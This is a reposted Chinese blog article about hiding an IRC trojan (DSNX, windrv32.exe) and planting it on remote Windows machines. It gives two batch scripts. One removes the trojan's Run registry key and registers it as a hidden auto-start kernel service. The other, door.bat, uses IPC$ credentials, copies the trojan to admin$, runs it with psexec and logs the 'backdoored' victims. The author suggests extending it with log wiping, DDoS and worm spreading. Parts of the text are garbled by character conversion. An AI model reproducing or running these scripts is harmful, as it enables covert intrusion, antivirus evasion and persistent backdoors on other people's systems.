批处理***与注册表
我們現(xiàn)在在使用一些比較老的***時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現(xiàn)***的自啟動.然而這樣很容易袒露***程序的路徑,從而導(dǎo)致***被查殺,相對于地如果將***程序注冊為系統(tǒng)服務(wù)則相對寧靜一些.下面以設(shè)置裝備擺設(shè)好地IRC***DSNX為例(名為windrv32.exe)??
@start windrv32.exe??
@attrib +h +r windrv32.exe??
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll??
@echo "windsnx "=- >>patch.dll??
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe??
@regedit /s patch.dll??
@delete patch.dll??
@REM [刪除DSNXDE在注冊表中的啟動項,用sc.exe將之注冊為系統(tǒng)癥結(jié)性服務(wù)的同時將其屬性設(shè)為隱藏和只讀,并config為自啟動]??
@REM 這樣不是更安全^_^.??
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------??
@net use \\%1\ipc$ %3 /u:"%2"??
@if errorlevel 1 goto failed??
@echo Trying to establish the IPC$ connection …………OK??
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt??
@psexec \\%1 c:\winnt\system32\windrv32.exe??
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt??
:failed??
@echo Sorry can not connected to the victim.??
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------??
這只是一個自動種植后門批處理的雛形,兩個批處理和后門程序(Windrv32.exe),PSexec.exe需放在同一目錄下.批處理內(nèi)容??
尚可擴大,比方:參加掃除日記+DDOS的功能,,加入定時增加用戶的功效,更深刻一點可使之具備主動傳布功能(蠕蟲).此處未幾做敘述,有興致的朋儕可自行鉆研.??
?
轉(zhuǎn)載于:https://blog.51cto.com/dnsdhcp/592626
總結(jié)
以上是生活随笔為你收集整理的批处理***与注册表的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 忍耐的过程
- 下一篇: TCP三次握手及四次挥手详细图解